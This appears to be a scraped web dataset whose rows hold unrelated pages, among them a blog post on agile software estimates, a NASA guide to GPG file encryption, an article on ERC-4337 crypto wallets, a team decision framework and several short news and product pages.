I think we can all agree that fixed budgets and agile methodologies don’t go so well together, but let’s face it, if you’re in the business of offering software development services, you are most likely to work with a client that is not tech-savvy and doesn’t care about sprints and story points. **He cares about the final cost of the project, how much funds he needs to raise and how long will it take.** Honestly, I expect these questions from every client, and find it confusing that anyone would ever accept a business proposal without even a range of possible costs and deadlines.
With that said, we always try to avoid giving a single fixed number for the budget. **Try and negotiate a range**, and make sure that if the budget is fixed at least the scope is flexible. If both are fixed (yes, those exist too) then the specification should be considered the Law, and the contract should protect you if even minor changes are made to the scope. These are definitely the hardest to deal with, and should be avoided if possible.
Much more troubling is the difference between project ideas and real specifications. Project ideas are basically the *“specifications”* the client provides you with, which is usually a simple set of explanations, drawings, sketches that represent how the client envisioned the final product. It is **nowhere near** a working prototype or a decent technical spec, and if you base your estimate on those, you’ll be in a lot of trouble real soon. Even with real project specifications that include wireframes and working prototypes, if you look close enough, I’m sure you will find more than a few plot holes and logical mistakes in the application workflow.
Looking at the types of projects mentioned above, the worst case scenario is fixed budget + project idea, and the best one is flexible budget + project specification. In both cases, the method of coming up with an estimate will be the same. The easier (better) one will be more precise and usually faster to do, but both estimates should keep you out of trouble.
## Preconditions of good estimates
With this in mind, let’s talk about the preconditions behind good estimates. For this process to work you will need:
**Clickable wireframes/prototypes****Engaged clients****Contracts that are adjusted to agile methodologies.**
In the best case, where the client actually gives you a working prototype and has a great technical specification where everything is properly explained, you can skip no.1 in the list above and go straight to estimation. In my 5 year career, I might have had one or two such cases. Usually, upon closer examination, these wireframes and specifications contain a lot of mistakes, missing screens and features that are crucial for the application to work properly.
That is why we always separate the process of working on a project in 2 steps. One would be creating a clickable prototype which will also serve as *“living”* specification of the project. The second step would be developing the project, with the business proposal based on the prototype we developed in the first phase. **These two steps are completely divided**, in a way that the client can actually only ask for a working prototype + specification from our team, and do his own inhouse development. Of course, the goal is to work on the development of the project, but there were cases where we only delivered wireframe and UX services which were beneficial for both the client and the agency.
Without going into too much detail (because this will be covered by one of our UX experts in the near future), the first thing we do is have a number of time-intensive meetings with the client where we write down and sketch each feature as detailed as possible in the given timeframe. User Experience (UX) guys start developing a prototype in Axure on the spot, and refine it afterwards.
Once we’re sure that each scenario that we managed to come up with works on the prototype, we consider it good enough to act as a specification and a frame for a business proposal. It usually takes a couple of iterations to get it done. If possible, try and have the whole team (that will work on this project) participate in these meetings. As you can see, here is where the *“engaged client”* precondition comes into play. The client needs to be a part of the whole process, give feedback, provide necessary materials and explanations etc. This is actually important during development as well, so make sure to have a dedicated individual on the client’s side that will be available and engaged as the rest of your team.
Good contracts are also a huge part of working in an agile software development company. This is really a whole other subject in itself, but for now let’s say that you need to form them in a way that will support agile principles. If the scope changes, the number of working hours must change as well; if a client doesn’t provide you with materials on time, they can’t expect the same deadline; estimates are estimates, and estimates can be wrong, which should also be clearly stated in the contracts with defined steps what to do in that case; work is always done incrementally etc. I think you get the gist of it – don’t use old school contracts that aren’t really fit for software development. **If your process is agile, your contracts should also be.**
## How we do estimates
Now that we defined different types of projects and preconditions for a good estimate, here is how it looks like in practice. This is a fictional project with fictional numbers (I combined a couple of different estimates here) so some numbers might not be realistic, but should serve the purpose of explaining how the estimate table works:
Depending on the project and team size, the number of rows and columns will vary, but the structure should be pretty much the same. As you can see, on the left side of the table, rows will be used to list features (or sections) of the project based on the prototype. There are a couple of miscellaneous sections as well, like Project Setup, Test coverage, Speed optimization that aren’t directly connected to a single feature.
Columns are used to define team roles and min and max working hour estimates for each feature per team role.
As you can notice, the Design column doesn’t have min and max hours defined per feature, because designers like to give estimates based on larger sections (whole pages for example), so they sum it up at the bottom of the table.
The section above is the first part of creating an estimate. As we explained before, our UX team creates a clickable wireframe that through contracts becomes the project’s living specification. A PM should prepare this estimate table – list all feature, add columns for team members, set up formulas etc. The same team that hopefully attended these UX meetings will now go together through the wireframes and features in the table and give their minimum and maximum estimates.
Regarding PM and Quality Assurance (QA) hours, it’s difficult to give estimates based on features, so a number that seems to work very well for us is to calculate one third of working hours from the team member that has the highest TOTAL min and max estimates. In the example above, that would mean that for the first feature, our IONIC developer has 18-22h. One third of that would be 6-7h for PM and QA team roles (we always round to whole numbers).
After the min and max estimates are done by the team, it’s time to come up with a frame for the business proposal. The first thing to do is to calculate the total number of working hours per role and for the whole team:
These calculations are very simple, you just sum up the number of working hours by column for team roles, and then sum them up by min and max for the whole team. The next part is figuring out the timeframe:
**Divide the number of min and max working hours by 6.5h (which I consider to be an average effective working day for a team member) to get the number of working days****Then divide the number of working days with an average number of working days in a month (about 22) to get the min and max number of months needed to finish the project****Add a 20% buffer to the timeframe because you can’t always plan for the unexpected – team member illness, vacations, paid leave etc.**
The last thing remaining is coming up with a budget. We always try to have one team dedicated to only one project until it’s completely done. That means that the client pays for the whole team per working day. That is why we take the** total number of working hours, divide it with 7h **to get a number of effective working days (1h of daily break)** and multiply it with 8h and the hourly rate of let’s say €50 **to get the estimated min and max budgets.
As you can see, the difference between min and max is quite big, and in the business proposal we usually give a range 20-30% larger than the min estimate and 20-30% smaller than the max estimate to make it more even. We also tend to round up the months in the timeframe if we end up with decimal numbers.
## Fin
We always try to be **as transparent as possible** with our clients, so we always share this estimate table with them and include it in the business proposal. They can see how we came up with our estimated numbers and have a detailed breakdown feature by feature. You might have noticed that some of the rows are in orange color – they represent features that can be dropped out of the first MVP phase of the project. **It’s also easier for the client to plan his budget and timeframe this way, **and it’s not unusual for them to remove (or even add) a feature or two once they have the development plan laid out like this to better fit their budget and release schedule.
In some rare cases (for us at least), a client will take a full-time team for a long period without a predefined scope, and you would only need to do these estimate on a feature by feature basis. The timeframe will most likely be enough in that case, since the budget is based on the working hours of a full-time team on a monthly basis.
As promised at the beginning of this lengthy blog post, here’s the link to a view only estimate table (you can download it, or c/p it for yourself though).
I’m sure the format of this table can be much more aesthetically pleasing, but we use the business proposal for that. This is just **a tool to come up with a decent estimate** that won’t cause us issues later on in the project. Just to be clear, we did sometimes go over budget with these estimates but it was in a reasonable amount and it was much easier to discuss these extra costs with our clients. Afterall, they were involved in creating the prototypes and estimates and are fully aware of what goes into the development of their project feature by feature.
I hope some of you at least will find this blog post helpful, and I would love to hear your way of dealing with project estimates, and ideas to improve the process. | true | true | true | In this blog post, I’d like to give an overview of how we come up with project estimates and business proposals for our clients. Working as a Project Manager (... | 2024-10-12 00:00:00 | 2019-07-09 00:00:00 | website | locastic.com | Locastic | null | null |
|
41,190,780 | https://www.nytimes.com/2024/08/07/science/sea-lion-videos-cameras.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
6,260,358 | http://weblogs.asp.net/jgalloway/archive/2013/08/22/adding-an-audio-play-indicator-to-your-page-s-tab-with-a-few-lines-of-javascript.aspx#.UhaIoA8Y0MU.hackernews | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,946,172 | http://www.nas.nasa.gov/hecc/support/kb/using-gpg-to-encrypt-your-data_242.html | Using GPG to Encrypt Your Data | null | Encryption helps protect your files during inter-host file transfers that use protocols that are not already encrypted—for example, when using ftp or when using shiftc without the --secure option. We recommend using the GNU Privacy Guard (GPG), an Open Source OpenPGP-compatible encryption system.
GPG has been installed on Pleiades, Endeavour, and Lou in the /usr/bin/gpg directory. If you do not have GPG installed on the system(s) that you would like to use for transferring files, please see the GPG website.
Choosing What Cipher to Use
We recommend using the cipher AES256, which uses a 256-bit Advanced Encryption Standard (AES) key to encrypt the data. Information on AES can be found at the National Institute of Standards and Technology's Computer Security Resource Center.
You can set your cipher in one of the following ways:
Add --cipher-algo AES256 to your ~/.gnupg/gpg.conf file.
Add --cipher-algo AES256 in the command line to override the default cipher, CAST5.
Examples
If you choose not to add the cipher-algo AES256 to your gpg.conf file, you can add --cipher-algo AES256 on any of these simple example command lines to override the default cipher, CAST5.
Creating an Encrypted File
Both commands below are identical. They encrypt the test.out file and produce the encrypted version in the test.gpg file:
You will be prompted for a passphrase, which will be used later to decrypt the file.
Decrypting a File
The following command decrypts the test.gpg file and produces the test.out file:
% gpg --output test.out -d test.gpg
You will be prompted for the passphrase that you used to encrypt the file. If you don't use the --output option, the command output goes to STDOUT. If you don't use any flags, it will decrypt to a file without the .gpg suffix. For example, using the following command line would result in the decrypted data in a file named "test":
% gpg test.gpg
Selecting a Passphrase
Your passphrase should have sufficient information entropy. We suggest that you include five words of 5-10 letters in size, chosen at random, with spaces, special characters, and/or numbers embedded into the words.
You need to be able to recall the passphrase that was used to encrypt the file.
Factors that Affect Encrypt/Decrypt Speed on NAS Filesystems
We do not recommend using the --armour option for encrypting files that will be transferred to/from NAS systems. This option is mainly intended for sending binary data through email, not via transfer commands such as ftp or shiftc with the -secure option. The file size tends to be about 33% bigger than without this option, and encrypting the data takes about 10-15% longer.
The level of compression used when encrypting/decrypting affects the time required to complete the operation. There are three options for the compression algorithm: none, zip, and zlib.
If your data is not compressible, --compress-algo 0 (none) gives you a performance increase of about 50% compared to --compress-algo 1 or --compress-algo 2.
If your data is highly compressible, choosing the zlib or zip option will not only increase the speed by 20-50%, it will also reduce the file size by up to 20x. For example, in one test on a NAS system, a 517 megabyte (MB) highly compressible file was compressed to 30 MB.
The zlib option is not compatible with PGP 6.x, but neither is the cipher algorithm AES256. Using the zlib option is about 10% faster than using the zip option on a NAS system, and zlib compresses about 10% better than zip.
Random Benchmark Data
We tested the encryption/decryption speed of three different files (1 MB, 150 MB, and 517 MB) on NAS systems. The file used for the 1 MB test was an RPM file, presumably already compressed, since the resulting file sizes for the none/zip/zlib options were within 1% of each other. The 150 MB file was an ISO file, also assumed to be a compressed binary file for the same reasons. The 517 MB file was a text file. These runs were performed on a CXFS filesystem when many other users' jobs were running. The performance reported here is for reference only, and not the best or worst performance you can expect.
Using AES256 as the Cipher Algorithm
1 MB File
150 MB File
517 MB File
with --armour
~5.5 secs to encrypt
~40 secs to encrypt
without --armour
~4 secs to encrypt
~35 secs to encrypt
without --armour, zlib compression
~33 secs to encrypt; ~28 secs to decrypt to file
~33 secs, resultant file size ~30 MB; ~34 secs to decrypt to file
without --armour, zip compression
~36 secs to encrypt; ~31 secs to decrypt to file
~38 secs, resultant file size ~33 MB; ~34 secs to decrypt to file
without --armour, no compression
~19 secs to encrypt; ~25 secs to decrypt to file
~49 secs, resultant file size ~517 MB; ~75 secs to decrypt to file | true | true | true | Use GPG with the cipher AES256, without the --armour option, and with compression to encrypt your files during inter-host transfers. | 2024-10-12 00:00:00 | 2022-04-28 00:00:00 | null | null | null | null | null | null |
306,971 | http://www.bloomberg.com/apps/news?pid=20601087&sid=aIRza4.azeC4&refer=worldwide | Bloomberg | null | To continue, please click the box below to let us know you're not a robot.
Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy.
For inquiries related to this message please contact our support team and provide the reference ID below. | true | true | true | null | 2024-10-12 00:00:00 | null | null | null | null | null | null | null |
37,437,222 | https://www.coinfabrik.com/blog/unlocking-the-potential-of-erc-4337-innovations-in-crypto-wallets/ | Unlocking ERC-4337: Crypto Wallet Innovations | CoinFabrik | CoinFabrik | ## Introduction
BLOK Capital approached CoinFabrik to help them to specify and implement a prototype of a new asset management protocol. The product requirements were pretty straightforward: the solution should be decentralized and users must be in full custody of their tokens while letting a wealth manager chosen by them to invest their crypto assets on their behalf.
## First steps
Working closely with BLOK Capital stakeholders, we started by going through the requirements in order to reach a solid understanding of our customer’s vision. This collaborative effort between BLOK Capital and CoinFabrik’s product and technical experts was key to successfully defining the features that would comprise BLOK’s prototype and validating its technical feasibility.
Taking into account the main product propositions -decentralization, self custody and wallet management by a third party- we immediately recognized the potential for innovation. Naturally, our focus shifted to crafting an architecture that could support such a product while meeting all the stipulated requirements.
After extensive research, we arrived at the conclusion that the newly introduced Ethereum standard, ERC-4337, could precisely align with BLOK’s goals.
## Why ERC-4337?
ERC-4337, introduced in February 2023, marks a significant milestone toward web3 mass adoption. It empowers the implementation of robust and versatile wallets, setting it apart from traditional crypto wallets. ERC-4337 wallets, unlike their conventional counterparts, function as smart contracts, enabling the integration of exciting additional features. Furthermore, ERC-4337 promises a superior user experience by offering features like social authentication, account recovery, and reduced transaction fees for users.
## ERC-4337 account abstraction
ERC-4337 account abstraction, in simple terms, is a way to make using cryptocurrencies more flexible and user-friendly.
Imagine your cryptocurrency wallet as a house with a locked front door. With traditional wallets, you need to use a specific key to open your door, just like you need a private key to access your cryptocurrency. ERC-4337, however, allows you to have a smart front door that can open in different ways, not just with a key.
### Here’s how it works:
#### Keyless Entry
Instead of just using a key (private key), you can set up your front door to recognize your face, your voice, or even a secret code. In cryptocurrency terms, this means you can access your funds not just with a private key but with other methods like biometrics (your fingerprint or face), passwords, or even multi-factor authentication.
#### Multiple Ways In
With ERC-4337, you can have multiple ways to access your funds. It’s like having a front door that opens not just for you but also for your family members or trusted friends. In cryptocurrency, this could mean you can share access to your funds with someone you trust, like a financial advisor, without giving them your private key. They can help you manage your money without having full control.
#### Cost Savings
ERC-4337 can also help save on transaction fees. Think of it like having a discount card for your favorite store. You get to pay less when you use it. Similarly, with ERC-4337, you might pay fewer fees when you make transactions on the blockchain.
So, ERC-4337 account abstraction is like upgrading your cryptocurrency wallet’s front door to be smarter, more secure, and more versatile. It gives you different ways to access your funds, allows you to share access with trusted people, and might even save you some money in the process.
## ERC-4337 main components
First, it’s important to go through the main components of the ERC-4337 architecture.
**UserOperation**: These are pseudo-transaction objects used to execute transactions with Smart Accounts. They capture the user’s intention of what they want to do.
**Bundler**: Bundlers are actors that package UserOperations from a mempool and send them to the EntryPoint contract on the blockchain. They listen to at least one UserOperation mempool, run simulations, group an array of UserOperations, and relay packets to the EntryPoint.
**EntryPoint**: EntryPoint is a unique contract that serves as a central entity for all Smart Accounts and Paymaster ERC-4337. It coordinates the verification and execution of a UserOperation. For this reason, it’s crucial that all implementations of an EntryPoint are audited and immutable.
**Verification Loop**: It verifies that each UserOperation is valid by comparing it with both the Smart Account and the Paymaster contract.
**Execution Loop**: It sends each UserOperation to the Smart Account. The verification cycle also ensures that the Smart Account or Paymaster contract can cover the maximum gas cost for each user operation.
**Smart Accounts**: These are end-user accounts. At a minimum, they must verify whether they will accept a user operation during the verification cycle. Additional features can be added to support other account functions, such as social recovery and multiple operations.
Additional functionalities provided by ERC-4337 standard include:
**Paymaster**: It sponsors the gas fees for a UserOperation, and two things are required. One is to check whether it accepts the UserOperation during the verification cycle. The other is to execute the required fee logic in the execution loop.
**Aggregator**: It is an entity trusted by contract accounts to validate signatures. They are often used to aggregate signatures from multiple user operations together.
## A real-world application: ERC-4337 frameworks and user authentication
After some research on the available smart wallets solutions based upon ERC-4337 we decided to use the framework offered by ZeroDev.
ZeroDev framework allows to create both custodial and non-custodial wallets, use powerful features -such as gas sponsoring, transaction batching or social recovery- and extend the wallet functionality with custom built plugins.
Getting into details, every smart wallet created with ZeroDev is a smart contract known as Kernel, which includes the minimum wallet features. However, the nice part is that this Kernel contract supports the addition of almost any advanced wallet logic.
On the other hand, another important feature of ZeroDev is the splitting of transactions into validation and execution phases.
As its name implies, validators indicate how a transaction will be validated before being executed. In this phase, entryPoint calls the function validateUserOp of the Kernel contract and the transaction can be executed in 3 different ways:
**Sudo mode (0x0)**: predetermined validator that checks that the transaction is signed by the owner.**Plugin mode (0x1)**: the Kernel contract searches for the validator that will use the functions selector of the calldata file.**Enable mode (0x2)**: the kernel contract enables a validator by associating the current function selector with the validator.
As for the executors, these are smart contracts that implement the additional functions of the smart wallet. This means that when calling kernel.someFunction(), someFunction() logic is implemented in the executor instead of in the Kernel contract itself, which simplifies development.
## User authentication and wallet deployment
One of our concerns was to take advantage of the options that ERC-4337 offers to implement a simple user experience, especially considering the learning curve of traditional crypto wallets, which is sometimes challenging for non-crypto users.
A key element of crypto wallets user experience is user authentication. For this, we relied on Web3Auth, which is an infrastructure solution for web3 wallets and apps that allows the implementation of social authentication -Google, Facebook, X (former Twitter)- into a web3 dApp.
Once logged in, it is possible to get the address of the Smart Wallet without the need to deploy it in the blockchain, as the address is abstracted from the final signature obtained by Web3Auth. The wallet will be deployed only after a userOperation is performed with the new address.
The following image illustrates the prototype architecture:
## Gas sponsorship
A great ERC-4337 feature is the possibility to sponsor transaction fees both in gwei and in ERC-20 tokens. To achieve this it is necessary to set different gas policies. ZeroDev allows the implementation of three different types of policies:
- Project policies
- Contract policies
- Wallet policies
These can be configured with the API, where it is also possible to set fees limits:
- Amount of gas
- Amount of requests
- Gas price
- Amount of gas per transaction
## Example: Create UserOperation
This code snippet shows the creation of a function that executes a userOperation. ZeroDev’s SDK has sendUserOperation function, which expects the following parameters:
**Target**: address of the contract to interact with.**Data**: all the information of the function that will be executed (contract abi, function name, function arguments.
const userOperation = await zeroDevSigner.sendUserOperation({ target: contract.target, data: encodeFunctionData({ abi, functionName: "functionName", args: [ "Argm1","Argm2" ], }), | true | true | true | Discover the latest innovations in ERC-4337 crypto wallets and unlock their full potential. Explore the future of digital asset security. | 2024-10-12 00:00:00 | 2023-09-08 00:00:00 | article | coinfabrik.com | CoinFabrik | null | null |
|
40,781,632 | https://www.bizjournals.com/triangle/news/2024/06/24/apple-delays-plans-rtp-campus-raleigh-hub.html | null | null | Request unsuccessful. Incapsula incident ID: 6525000170225277148-465081139665372239 | true | true | true | null | 2024-10-12 00:00:00 | null | null | null | null | null | null | null |
20,108,030 | https://matterapp.com/blog/decision-disagreement-framework-how-we-encourage-disagreements-at-matter/ | Decision Disagreement Framework - How we encourage disagreements at Matter | Jeff Hagel President; H | As a team member, how do you voice your disagreement with a decision that you believe is not in the best interest of the company? As a leader, how do you enable your team to disagree with decisions in an equitable and productive way?
We set out to answer these questions at Matter. Although there are a number of useful frameworks for making NEW decisions (e.g., those shared by Gokul at Square, Brian at Coinbase, and Bain), **we couldn’t find a framework for handling and supporting disagreements after decisions have been made, especially if you weren’t a part of making that decision**. We took inspiration from existing frameworks to create the Decision Disagreement Framework.
Since we began implementing this framework, I’ve been blown away by the results. By embracing this framework, our team has come up with significantly better, more innovative, and less technically complex solutions. No one has felt like they have compromised or “given up” on important issues. In this post, I’ll share how our Decision Disagreement Framework works. You can view our decision disagreement framework template here.
Here is a step-by-step guide for using the decision disagreement framework:
## 1. Set the Parameters
**Determine if you should use the decision disagreement framework**
**If you are the one disagreeing with a decision:**
Next time you disagree with a decision ask yourself:
Will the decision slow down, harm, or break the business?
If your answer is yes, use the framework. If not, the disagreement is likely not worth the time and effort involved in using the framework.
**If you are on the receiving end of a team member’s disagreement:**
First, acknowledge the disagreement and paraphrase the opinion of the person disagreeing to make sure they know they have been heard. Second, ask the person to answer the question above.
**Define the disagreement**
Brevity is key. Define the disagreement with a maximum of 1 to 3 sentences.
**Decide on the decision maker.**
There can only be one decision maker. Although each team member will be heard, one person will make a final decision for the good of the business. If you’re a startup with less than 15 people or at a startup that is pre-product-market fit, this person should be the CEO. If you’re at a larger company, the decision maker should be a lead or head of a cross-functional group. This may be a Head of Product, Head of Design, or Head of Engineering. Pick the individual that makes the most sense for the given decision. Large companies may require an additional approver (e.g., a General Manager, Chief Product/Engineering/Design Officer or even the CEO). However, keep in mind that the framework is optimally suited for smaller teams and companies.
**Determine the stakeholders**
List all the people who need to have input before the decision maker can make their decision. This step is necessary to make sure everyone involved has dedicated time to communicate their opinion and feel heard before the final decision is made.
## 2. Deliberate the Options
Prior to bringing stakeholders together, the person who raises the decision disagreement must list 2 to 3 initial resolution options to discuss as a team. This is a key time-saver: By doing this before the group meets, the person raising the disagreement productively processes their thoughts and prepares various options along with each option’s effort, pros, and cons. As an optional step, stakeholders may be sent the various resolution options prior to the meeting.
This step aligns with one of the most important reasons that people join small companies: They want to be a part of the process, not just told what to do.
Remember that it’s okay if their option isn’t part of the final decision, as long as the team has given it thoughtful time and consideration. This means listening to understand or active listening. Contrast this with listening to respond where individuals listen as they think about their own ideas (whether they agree or disagree) and devise their response.
**3. Collect Votes, Make the Decision, and Document the Rationale**
After all options have been reviewed and discussed as a group, the decision maker should ask each stakeholder: *Which option do you vote for and why?*
In contrast to blind voting, this should be done openly, in the group setting. This is not only an exercise in efficient decision making, it is one for improving transparency, honesty, and candor - key skills for working well within small companies.
After the decision maker has heard from each stakeholder, it’s time for that person to make a decision and explain the rationale. After the decision has been stated, the decision maker requests that each team member commit support to the decision aloud. This creates a shared mindset and path for the team to move forward for the good of the company. Finally, the decision maker will share the decision and its rationale with the entire company within 24 hours. If your company uses Slack, consider sharing the decision in the general channel along with the completed worksheet. If your company does not use Slack, a company-wide email is a good option for sharing the decision and its associated rationale.
At Matter, using this framework has provided a much more harmonious method for dealing with disagreements, as well as significantly better solutions.
Importantly, this framework doesn’t require folks to compromise, surrender, or give up their strong options. Rather, it’s a team-based framework that leads to team-oriented resolutions.
You can view our decision disagreement framework template here.
## When should the decision disagreement framework be used?
Not every decision warrants using a decision disagreement framework. Use a decision disagreement framework to work through conflicts that could slow down, harm, or break your business. Let’s look at a couple of examples:
**Example 1: Not Appropriate for the Decision Disagreement Framework**
Product/Engineering doesn’t like the color of a button. Why isn’t this appropriate for a decision disagreement framework? One, this a subjective opinion that is not likely to slow down your company or harm long-term prospects. Two, this could be resolved with a short conversation with the designer that involves quick feedback, a timely decision, and brief communication of rationale for the decision.** **
**Example 2: Appropriate for the Decision Disagreement Framework**
Design created a new user experience with a filtering option for sorting through a list of items. This sorting feature took design less than a day to design. When engineering prepared to work on this feature, they realized it would take two weeks of work due to all the hidden complexities. In this scenario, engineering could use the decision disagreement framework to productively and efficiently meet with key stakeholders (engineering, design, and product) to decide how to move forward in a way that is best for the business.
## Why is this decision disagreement framework useful?
- It helps leaders create a culture of transparency, honesty, and candor which is key for people who want to work at small companies.
- It helps the person who disagrees share their concerns in a concise, efficient, and productive manner.
- It helps team members empathize with the individual’s point of view. In the use case above, product and design might be surprised to learn that a filtering capability takes two weeks to build.
- It helps the person who disagrees learn about the research and deep thinking that went behind the decision.
- It helps get the initial options on the table. Rather than have the person who disagrees “wing it” and try to whiteboard their concerns in real time, options are thought through prior to bringing them to the team for consideration.
- It helps the team reach a shared understanding of the complexities of the disagreement and the resolution. Once a decision is made, everyone is able to move forward with a decision that’s best for the business.
## Conclusions:
- Disagreement is not a dirty word 💡
- Effective leadership means the ability to create and facilitate a user-obsessed culture where candid disagreement is encouraged 💬
- Disagreement must happn if a decision could slow down, harm, or break your business 💯
- Practice active listening, not listening to respond 👂
- Productive decision disagreements will lead to much better outcomes 🔮
If the way we work at Matter resonates with you, we’d love to chat! If you’re interested in joining the Matter team, please view our career opportunities here.
Thanks to Danielle Roubinov, Kerem Kazan, and Lenny Rachitsky for reading drafts of this and providing candid feedback. | true | true | true | How do you disagree with a decision that is not in the best interest of the company? As a leader, how do you enable your team to disagree in a productive way? Learn how with Matter's Decision Disagreement Framework. | 2024-10-12 00:00:00 | 2019-06-05 00:00:00 | website | matterapp.com | matterapp.com | null | null |
|
7,227,537 | http://www.complex.com/tech/2014/02/steve-jobs-time-capsule | A Time Capsule Buried By Steve Jobs Has Been Dug Up 30 Years Later | Jason Duaine Hahn | # A Time Capsule Buried By Steve Jobs Has Been Dug Up 30 Years Later
A modern day treasure hunt.
Back when Steve Jobs was in Aspen, Colorado, in 1983 to give a talk at the International Design Conference, he decided to have a little fun and bury a time capsule in an undisclosed location. Now, 30 years later, the capsule has been dug up, and the thanks goes to a reality television show.
The team, from National Geographic's reality show "Digger," unearthed the 13-foot-long tube in Aspen, which contained a bunch of things that were important to Jobs. So far, the team has said that the tube contained personal photographs of Jobs, a mouse for the Lisa computer (which was one of the first commercial mice ever sold), and a six-pack of beer that was meant for the crew that found the capsule. The other items within the capsule will be revealed in an upcoming episode of the show.
Still, can't help but ask: isn't **30 years** just a little too soon?
[via *CNET*] | true | true | true | A modern day treasure hunt. | 2024-10-12 00:00:00 | 2013-09-23 00:00:00 | https://images.complex.com/complex/image/upload/ar_1.91,c_fill,g_auto,q_auto/v20240908/sanity-new/tmp-name-3-547-1670627818-115_16x9-6646260 | article | complex.com | Complex | null | null |
16,829,948 | https://tabler.github.io/ | Tabler | null | # Develop beautiful web apps with Tabler
Tabler is a free and open source web application UI kit based on Bootstrap 5, with hundreds responsive components and multiple layouts.
## Free and open source
A big choice of free UI elements and layouts in one efficient, open source solution
## Based on Bootstrap 5
Based on the latest version of Bootstrap, Tabler is a UI Kit of the future
## Modern design
Beautiful, fully responsive UI elements that will make your design modern and user-friendly
## Benefit from Tabler’s top-notch features
## Multiple Demos
6 Pre-built layout options to cater needs of modern web applications. Ready-to-use UI elements enable to develop modern web application with great speed
## Create a perfect interface. Make your life easier.
### Designed with users in mind
Tabler is fully responsive and compatible with all modern browsers. Thanks to its modern, user-friendly design you can create a fully functional interface that users will love. Every UI element has been created with attention to detail to make your interface beautiful!
### Built for developers
Having in mind what it takes to write high-quality code, we want to help you speed up the development process and keep your code clean. Based on Bootstrap 5, Tabler is a cutting-edge solution, compatible with all modern browsers and fully responsive.
### Fully customizable
You can easily customize the UI elements to make them fit the needs of your project. And don’t worry if you don’t have much experience - Tabler is easy to get started!
## Dark theme whenever you need it ✨
### Change default variant when you need
Tabler is a beautiful dashboard that comes in 2 versions: Dark and Light Mode. If you are looking for a tool to manage and visualize data about your business, this dashboard is the thing for you. It combines colors that are easy on the eye, spacious cards, beautiful typography, and graphics.
### All components available in dark mode
Tabler contains a vast collection of assorted reusable dark UI components, page layouts, charts, tables, UI elements, and icons.
### A lot of reasons why dark theme are used widely
Dark mode saves battery life and can reduce eye fatigue in low-light conditions. The high contrast between text and background reduces eye fatigue, and the dark screen helps you focus your eyes longer and helps your brain keep more attention on the screen.
## Trusted by hundreds
Our Users send us bunch of smiles with our services, and we love them 😍
## From our blog
Stay updated with the latest news, tutorials, and guides from our team.
### Tabler Avatars - free user profile pictures!
Discover Tabler Avatars, our new open-source product featuring 100 customizable placeholder user profile pictures. Enhance…
### Exciting New Illustration Additions to Our Library
We are thrilled to announce the latest update to our illustration library, featuring five new…
### Tabler Illustrations is now available!
Discover the latest updates and sneak peeks from the Tabler team, including the new Tabler…
Can’t find the answer you’re looking for? Reach out to our customer support team. | true | true | true | Tabler comes with tons of well-designed components and features. Start your adventure with Tabler and make your dashboard great again. For free! | 2024-10-12 00:00:00 | null | website | tabler.io | Tabler | null | null |
|
10,637,991 | http://blog.startupcvs.com/2015/11/27/the-most-impressive-cv-i-have-ever-seen/?utm_source=hackernews&utm_medium=social&utm_campaign=bestcv17112015 | Eine für alle | null | Recruiting-Expertise trifft KI
Mit Rundum-Angebot für den gesamten Job-Lifecycle und KI-basiertem Matching.
# Eine für alle
So entsteht ein Angebot, das weit mehr ist, als klassisches Recruiting. Für unsere Talents & Professionals sind wir Karriere-Begleiterin, liefern Infos & Tools rund ums Arbeitsleben und – auf Wunsch, KI-unterstützt personalisierte Jobangebote. Unseren Companys bieten wir den Zugang zu passenden Kandidat:innen für ihre Teams mit Expertise, active Sourcing und KI-basiertem Matching.## Unser Angebot für dich
Talents & Professionals
Tools und Inhalte rund um Werte, Führungsrollen, Konfliktlösung, richtig gute Meetings u. v. m.
Dazu spannende Jobangebote und exklusive Tipps von unseren Recruiting-Profis.
Einfach registrieren und alles kostenfrei nutzen.
Companys
Unsere Recruiting-Profis verschaffen dir Zugang zu den richtigen Kandidat:innen, mit Active Sourcing und KI-gestütztem Matching.
Für einzelne Stellen, oder ganze Teams.
Faire Konditionen und volle Kostenkontrolle.
Medical
Exklusive Jobangebote für Vertretungsärzt:innen in diversen Positionen und Fachrichtungen.
Direkter Zugang zu interessierten Mediziner:innen für Kliniken und Einrichtungen.
Persönlich betreut durch unsere Recruiting-Profis.
## Erfolgsgeschichten
LIZ Smart Office GmbH
Mit Taledo fühlen wir uns wie im Talente-Paradies! Wir schätzen besonders den professionellen Service, das Engagement und nicht zuletzt die Qualität der Kandidat:innen.
Franzisca Engels, COO
Über
LIZ Smart Office GmbH
Make any place your workplace. Plane deine Woche in Abstimmung mit deinem Team und buche Arbeitsplätze, Meetingräume und weitere Ressourcen mit der hybriden App. Optimiere zusätzlich deine Büronutzung mit oder ohne Sensoren.
Quality Match GmbH
Quality Match arbeitet in einem hochspezialisierten technischen Umfeld. Taledo sucht für uns aktiv nach Kandidat:innen, die diesem hohen Qualitätsanspruch gerecht werden.
Dr. Daniel Kondermann, Managing Director
Über
Quality Match GmbH
Wir sind darauf spezialisiert, durch verbesserte Qualitätssicherung und optimierte Annotationen die Qualität von Daten zu steigern. Unsere Expertise besteht darin, die Präzision und Verlässlichkeit von Datasets sicherzustellen, welche das Fundament für das Training von KI-Modellen bilden.
Pleodat GmbH
Taledo ist für uns bei Pleodat mehr als nur ein externer Recruiter. Wir bauen gemeinsam strategisch ein Team auf, aus Menschen mit herausragenden Ideen, besonderer Expertise und Leidenschaft.
Dr. Georg Loepp, Managing Director
Über
Pleodat GmbH
Pleodat will mit einem neuartigen Informationssystem mit kognitiven Ansätzen die Welt der Datenhaltung auf den Kopf stellen. Ziel ist es, aus Daten die Zukunft des Wissens zu bauen und unsere digitale Gesellschaft sicherer, vertrauensvoller und transparenter zu gestalten. | true | true | true | null | 2024-10-12 00:00:00 | 2012-01-01 00:00:00 | null | null | null | null | null | null |
26,201,751 | https://dailymemphian.com/section/coronavirus/article/20087/shelby-county-health-tosses-13000-vaccine-doses | 1,300 vaccine doses tossed in Memphis during bad weather | Jane Roberts | # 1,315 doses had to be tossed in inventory error
Health Department contracts with Regional One Health for pharmacy support to manage vaccine inventory.
# Topics
coronavirus vaccine wasted doses Shelby County Health Deparatment#### Jane Roberts
Longtime journalist Jane Roberts is a Minnesotan by birth and a Memphian by choice. She's lived and reported in the city more than two decades. She covers business news and features for The Daily Memphian.
